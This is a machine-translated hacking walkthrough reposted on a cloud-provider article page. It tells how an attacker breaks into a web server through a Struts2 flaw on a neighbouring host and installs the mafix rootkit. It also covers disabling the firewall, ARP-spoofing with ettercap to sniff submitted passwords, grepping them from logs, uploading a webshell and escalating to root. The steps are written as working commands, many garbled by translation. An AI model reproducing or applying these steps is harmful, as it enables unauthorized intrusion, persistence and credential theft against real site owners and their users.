Home > Cloud Computing > Cloud Security

Linux server with sniffing Password

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Linux server with sniffing Password

Objective: www.xxx.com

 

0x01 main site step


Currently, the main site dedecms does not have one available 0-day release, and the background is not the default one. google hack is fruitless.

 

0x02 peer Analysis

 

There are more than 20 peer stations, most of which are the secondary development of the on-site cms. There is no vulnerability, and there is also a bbs dz, there is no vulnerability.

 

0x03 C-segment Linux host breakthrough

 

You can find an ssss.com/login.action on the C-segment browser website. Get familiar with struct2 code execution without explanation.


0x04 Linux host Rookit

Here the Rookit I use is mafix

 

Run the following command:


Tar zxvf mafix.tar.gz

Chmod + x root

./Root password 23141

 

Putty Login

Note: If the firewall is on, you can disable it if you do not want to add rules to the firewall.

 

Stop Firewall

/Etc/init. d/iptables stop


Version

0x05 install the ettercap sniffing password on a Linux host

 

1. download and install the epel rpm package.

Rpm-ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm


2. yum-y install ettercap

Start sniffing

Enable Forwarding (not required)

Echo 1>/proc/sys/net/ipv4/ip_forward

 

Sniffing

 

Ettercap-T-M arp/Target ip/80/gateway/-w/tmp/log.txt

 

Sniffing may take a long time to run in the background

Nohup ettercap-T-M arp/Target ip/80/gateway/-w/tmp/log.txt

 

0x06 Data Filtering

 

Because the data on this website is very big, there is more than 1 GB of data in an hour. Well, grep filters out

 

Capture packets and analyze the field pwd of the password submitted by the target station foreground

 

Cat/tmp/log.txt | grep-a "& pwd =" | more

 

Okay, I will watch it every few hours. After half a day, I have sniffed the background password and the background address.

 

Bytes

0x07 upload a sentence root Privilege Escalation

Upload a sentence, flip the file, find the Root, and use my udf api to add a user to escalate permissions.

 

0x08.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
linux create user with password scp command in linux with password things to with linux server best linux distro for server with gui ssh command with username and password in linux sql server connection string with username and password login to ftp server with username and password command line
Related Article
How does personal cloud security guarantee data security?
Model-driven cloud security-automating cloud security with cl...
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More